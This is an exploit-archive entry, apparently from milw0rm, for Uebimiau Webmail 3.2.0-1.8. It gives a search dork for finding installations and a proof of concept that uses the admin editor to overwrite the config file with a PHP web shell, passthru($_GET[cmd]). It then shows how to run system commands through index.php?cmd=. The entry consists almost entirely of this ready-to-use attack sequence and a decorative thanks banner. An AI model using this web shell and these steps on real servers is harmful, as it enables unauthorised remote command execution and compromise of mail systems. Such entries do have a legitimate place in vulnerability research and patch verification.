Uebimiau Web-Mail 3.2.0-1.8 - Remote File / Overwrite

Author: GoLd_M
type: webapps
platform: php
port: 
date_added: 2009-06-11  
date_updated:   
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 8944.txt  
Uebimiau Webmail <= v3.2.0-1.8 Remote File / Overwrite Vulnerabilities
Dork : Uebimiau Webmail v3.2.0-1.8
POC :
     /uebimiau/admin/editor.php?load=config
And You Can Write Any Code As
<?php passthru($_GET[cmd]); ?> After That Click {Write To File}
Go
     /uebimiau/index.php?cmd=id
See Pic :http://www.almlf.com/get-6-2009-almlf_com_akszizl2.png
                               Thanx To
         .___________..______     ____    ____  ___       _______
         |           ||   _  \    \   \  /   / /   \     /  _____|
         `---|  |----`|  |_)  |    \   \/   / /  ^  \   |  |  __
             |  |     |      /      \_    _/ /  /_\  \  |  | |_ |
             |  |     |  |\  \----.   |  |  /  _____  \ |  |__| |
             |__|     | _| `._____|   |__| /__/     \__\ \______|

     ___       ______     ___       _______   _______ .___  ___. ____    ____
    /   \     /      |   /   \     |       \ |   ____||   \/   | \   \  /   /
   /  ^  \   |  ,----'  /  ^  \    |  .--.  ||  |__   |  \  /  |  \   \/   /
  /  /_\  \  |  |      /  /_\  \   |  |  |  ||   __|  |  |\/|  |   \_    _/
 /  _____  \ |  `----./  _____  \  |  '--'  ||  |____ |  |  |  |     |  |
/__/     \__\ \______/__/     \__\ |_______/ |_______||__|  |__|     |__|

# milw0rm.com [2009-06-12]